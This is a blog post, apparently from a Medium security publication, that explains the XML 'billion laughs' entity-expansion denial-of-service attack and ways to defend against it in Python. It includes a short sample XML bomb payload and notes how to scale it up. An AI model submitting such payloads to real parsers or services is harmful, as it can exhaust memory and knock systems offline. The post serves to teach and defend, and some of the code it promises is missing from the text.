DOS via a billion laughs ๐Ÿ˜ˆ

Consume arbitrary much RAM by repeated referencing

Martin Thoma
Dec 23, 2020 ยท 4 min read
Image for post
Image for post
Image by the author

The billion laughs attack is known since 2003 (source). The attack uses the references in XML files to make a small source file be huge in memory if all references are expanded. Itโ€™s also known as a LOL bomb, XML bomb, or in a variation as a YAML bomb and git bomb. It is a type of denial of service (DOS) attack as it can bring a service down.

Why you should care

This is a bit too specific to be visible in many news articles. However, there are several big projects which were vulnerable over the years:

How it works

The following XML defines an entity ha , then an entity ha2 which contains ha twice. This pattern is repeated. This means ha5 contains ha indirectly 16 times. You can see the exponential growth, canโ€™t you?

<?xml version="1.0"?><!DOCTYPE root [
<!ENTITY ha "๐Ÿ˜†">
<!ENTITY ha2 "&ha; &ha;">
<!ENTITY ha3 "&ha2; &ha2;">
<!ENTITY ha4 "&ha3; &ha3;">
<!ENTITY ha5 "&ha4; &ha4;">
]>
<root>&ha5;</root>

With ha31, we would have 2ยณโฐ times ๐Ÿ˜† . That is a billion laughs. Please note how asymmetric this is: With a document that is less than 1kB big the attacker can make the parser consume about Gigabytes of memory. This can easily consume all memory of a machine and thus render it unusable until the parser is killed or the machine is restarted.

A slight variation of the billion laughs attack is called quadratic blowup.

Please notice that similar attacks are possible in other file formats such as YAML. The key point here is that those formats have references.

How can I defend against a billion laughs?

Assuming that you cannot control the input directly and prevent XMLs with attacks from reaching you at all, I can think of 4 measures:

  • Lazy evaluation of references: Instead of evaluating the whole document at once, the references are only resolved when necessary. It might solve some issues.
  • No evaluation of references: Throwing the dangerous feature out of the window for sure means that youโ€™re not vulnerable to the attack anymore. You need to make sure it doesnโ€™t affect your users, though. Communicating this might be hard.
  • Reference recursion depth limit: The parser itself could be aware of this issue and have a threshold when it stops evaluating references. However, this might also lead to false-positives โ€” documents that get not parsed, because the parser thinks itโ€™s an attack.
  • RAM restriction: You can run the code that might execute the billion laughs attack under resource restrictions. This means the execution thread/process receives a (catchable) exception and can continue execution normally. It might especially mean that even if the exception is not thrown, the rest of your system might be fine. Only that thread/process might be killed.

So, how do you do this with Python?

For XML, the simplest solution is to use the defusedxml package as pointed out by Diederik van der Boor (thank you!)

The resource restriction is easiest:

Restricting the parser is sometimes possible, sometimes not. It depends on your parser. Some have parameters like resolve_entities (lxml).

Limiting the maximum decompression size was done against the HTTP/2 โ€œHPACKโ€ bomb (source).

See also

Kate Murphey wrote an awesome article about git bombs, check it out!

Whatโ€™s next?

In this series about application security (AppSec) we already explained some of the techniques of the attackers ๐Ÿ˜ˆ and also techniques of the defenders ๐Ÿ˜‡:

And this is about to come:

  • CSRF ๐Ÿ˜ˆ
  • DOS ๐Ÿ˜ˆ
  • Credential Stuffing ๐Ÿ˜ˆ
  • Cryptojacking ๐Ÿ˜ˆ
  • Single-Sign-On ๐Ÿ˜‡
  • Two-Factor Authentication ๐Ÿ˜‡
  • Backups ๐Ÿ˜‡
  • Disk Encryption ๐Ÿ˜‡

Let me know if you are interested in more articles around AppSec / InfoSec!

InfoSec Write-ups

A collection of write-ups from the best hackers in theโ€ฆ

Sign up for Infosec Writeups

By InfoSec Write-ups

Newsletter from Infosec Writeupsย Take a look

By signing up, you will create a Medium account if you donโ€™t already have one. Review our Privacy Policy for more information about our privacy practices.

Check your inbox
Medium sent you an email at to complete your subscription.

Martin Thoma

Written by

Iโ€™m a Software Engineer with focus on Data Science, Machine Learning. I have over 10 years of experience with Python. https://www.linkedin.com/in/martin-thoma/

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Martin Thoma

Written by

Iโ€™m a Software Engineer with focus on Data Science, Machine Learning. I have over 10 years of experience with Python. https://www.linkedin.com/in/martin-thoma/

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and youโ€™ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer โ€” welcome home. Itโ€™s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store